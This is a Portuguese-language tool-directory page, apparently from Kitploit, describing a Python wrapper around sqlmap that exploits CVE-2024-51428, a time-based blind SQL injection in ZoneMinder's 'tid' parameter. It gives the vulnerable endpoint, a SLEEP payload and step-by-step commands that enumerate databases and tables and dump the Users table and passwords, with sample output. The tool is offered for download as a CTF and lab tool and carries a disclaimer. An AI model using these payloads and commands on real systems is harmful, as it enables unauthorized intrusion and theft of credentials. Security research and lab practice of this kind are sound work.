Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-51428-PoC — Wrapper em Python para explorar CVE-2024-51428 no ZoneMinder usando Injeção SQL cega com sqlmap, automatizando enumeração de bases de dados, tabelas e extração de dados com saída limpa. | Kitploit
Ferramentas/GitHubGitHub/d1se0/cve-2024-51428-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

Wrapper em Python para explorar CVE-2024-51428 no ZoneMinder usando Injeção SQL cega com sqlmap, automatizando enumeração de bases de dados, tabelas e extração de dados com saída limpa.

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-51428 - Prova de Conceito de Injeção SQL Cega no ZoneMinder

Wrapper em Python para o sqlmap projetado para explorar o CVE-2024-51428 no ZoneMinder.
Esta ferramenta automatiza a detecção e exploração de uma vulnerabilidade de Injeção SQL Cega, mantendo a saída limpa e focada em dados úteis.

O script oculta os logs do sqlmap e exibe apenas informações relevantes, como:

  • Ponto de injeção detectado
  • Nomes de bancos de dados
  • Tabelas
  • Credenciais ou dados sensíveis despejados

Isso torna a ferramenta ideal para ambientes CTF, demonstrações e testes de segurança.


Visão Geral da Vulnerabilidade

CVE: CVE-2024-51428
Tipo: Injeção SQL Cega
Software Afetado: ZoneMinder
Vetor de Ataque: Parâmetro HTTP GET
Parâmetro: tid

A vulnerabilidade existe no seguinte endpoint:

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

O parâmetro tid não é devidamente sanitizado antes de ser usado em uma consulta ao banco de dados, permitindo que atacantes injetem consultas SQL.

A técnica de exploração utilizada é a injeção SQL cega baseada em tempo.

Exemplo de payload descoberto pelo sqlmap:

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

Esse payload força o banco de dados a dormir se a consulta for executada com sucesso, confirmando a presença de injeção SQL.


Recursos

  • Detecção automática de Injeção SQL Cega
  • Enumeração de banco de dados
  • Enumeração de tabelas
  • Despejo de tabelas
  • Filtragem de colunas
  • Filtragem de linhas
  • Saída limpa (logs do sqlmap ocultos)
  • Projetado para CTF e laboratórios de pentest

Requisitos

  • Python 3
  • sqlmap

Instale o sqlmap se necessário:

root@kitploit:~
sudo apt install sqlmap

Uso

Sintaxe básica:

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

Com este comando verificamos se é vulnerável ou não

Exemplo:

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

Obtendo o Cookie Necessário

O exploit requer um cookie de sessão válido do ZoneMinder.

Passos:

  1. Abra o alvo no seu navegador
  2. Abra as Ferramentas do Desenvolvedor
  3. Navegue até:
root@kitploit:~
Application → Cookies
  1. Localize o cookie chamado:
root@kitploit:~
ZMSESSID
  1. Copie seu valor e use-o com -c

Exemplo:

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

Verificando se o Alvo é Vulnerável

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

Exemplo de saída:

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

Enumerando Bancos de Dados

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

Exemplo de saída:

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

Enumerando Tabelas

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

Exemplo de saída:

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

Despejando uma Tabela

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

Despejando uma Coluna Específica

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

Exemplo:

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

Filtrando Linhas (cláusula WHERE)

Você pode filtrar linhas usando:

root@kitploit:~
-ff <COLUMN> <VALUE>

Exemplo:

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

SQL equivalente:

root@kitploit:~
WHERE Username='mark'

Despejando Senha para um Usuário Específico

Exemplo:

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

Comando sqlmap interno:

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

Como a Ferramenta Funciona

O script atua como um wrapper em torno do sqlmap.

Etapas realizadas internamente:

  1. Construir o endpoint vulnerável
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. Passar o cookie de autenticação para o sqlmap
  2. Executar o sqlmap com opções otimizadas:
root@kitploit:~
--threads=10
--technique=T
--batch
  1. Analisar a saída do sqlmap em tempo real
  2. Filtrar logs e exibir apenas:
  • informações de injeção
  • bancos de dados
  • tabelas
  • dados despejados

Uso Pretendido

Esta ferramenta foi criada para:

  • Desafios Capture The Flag
  • Pesquisa em segurança
  • Fins educacionais
  • Laboratórios de pentest

Aviso Legal

Este projeto é fornecido apenas para fins educacionais e de testes de segurança autorizados.

O autor não é responsável por qualquer uso indevido desta ferramenta.

Sempre obtenha a devida autorização antes de testar qualquer sistema.


Autor

Pesquisa em Segurança / Ferramentas CTF

Baixar ferramenta